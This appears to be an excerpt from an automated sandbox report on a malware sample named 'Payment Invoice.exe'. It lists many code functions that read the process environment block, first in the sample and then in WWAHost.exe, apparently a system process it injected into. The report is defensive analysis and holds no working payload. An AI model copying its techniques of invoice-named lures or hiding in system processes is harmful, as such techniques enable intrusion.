                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01746C0A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01746C0A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01746C0A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01746C0A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017814FB mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01746CF0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01746CF0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01746CF0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01798CD6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D849B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016DFF60 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01798F6A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016DEF40 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C4F2E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016C4F2E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FE730 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FA70E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FA70E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0175FF10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0175FF10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0179070D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0179070D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016EF716 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017037F5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01747794 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01747794 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01747794 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D8794 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D766D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016EAE73 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016EAE73 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016EAE73 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016EAE73 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016EAE73 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D7E41 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D7E41 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D7E41 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D7E41 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D7E41 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D7E41 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178AE44 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0178AE44 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0177FE3F mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CE620 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CC600 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CC600 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016CC600 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F8E00 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01781608 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FA61C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016FA61C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F16E0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016D76E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_016F36CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01798ED6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0177FEC0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01708EC7 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_017446A7 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01790EA5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01790EA5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_01790EA5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeCode function: 14_2_0175FE87 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03713B7A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03713B7A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EDB60 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B8B58 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EDB40 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EF358 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037A131B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037103E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037103E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037103E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037103E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037103E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037103E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0370DBE9 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037653CA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037653CA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03714BAD mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03714BAD mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03714BAD mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B5BA5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F1B8F mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F1B8F mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371B390 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03712397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037A138A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0379D380 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0372927A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0379B260 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0379B260 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B8A62 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03774257 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E9240 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E9240 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E9240 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E9240 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037AEA55 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03724A2C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03724A2C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F8A0A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03703A1C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037AAA16 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037AAA16 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EAA16 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EAA16 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E5210 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E5210 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E5210 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E5210 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03712AE4 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03712ACB mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371FAB0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E52A5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E52A5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E52A5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E52A5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E52A5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036FAAB0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036FAAB0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371D294 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371D294 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EC962 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EB171 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EB171 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0370B944 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0370B944 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371513A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371513A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03704120 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03704120 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03704120 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03704120 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03704120 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E9100 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E9100 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E9100 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EB1E1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EB1E1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EB1E1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037741E8 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037651BE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037651BE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037651BE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037651BE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037669A6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037161A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037161A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037A49A4 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037A49A4 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037A49A4 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037A49A4 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03712990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0370C182 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371A185 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037A2073 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B1074 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03700050 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03700050 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036FB02A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036FB02A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036FB02A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036FB02A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371002D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371002D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371002D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371002D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371002D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03767016 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03767016 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03767016 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B4015 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B4015 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E58EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E40E1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E40E1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E40E1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0377B8D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0377B8D0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0377B8D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0377B8D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0377B8D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0377B8D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371F0BF mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371F0BF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371F0BF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037120A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037120A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037120A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037120A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037120A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037120A0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037290AF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E9080 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03763884 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03763884 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036FFF60 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B8F6A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036FEF40 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E4F2E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036E4F2E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371E730 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0370F716 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0377FF10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0377FF10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B070D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B070D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371A70E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371A70E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037237F5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03767794 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03767794 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03767794 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F8794 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F766D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0370AE73 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0370AE73 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0370AE73 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0370AE73 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0370AE73 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F7E41 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F7E41 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F7E41 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F7E41 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F7E41 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F7E41 mov eax, dword ptr fs:[00000030h]
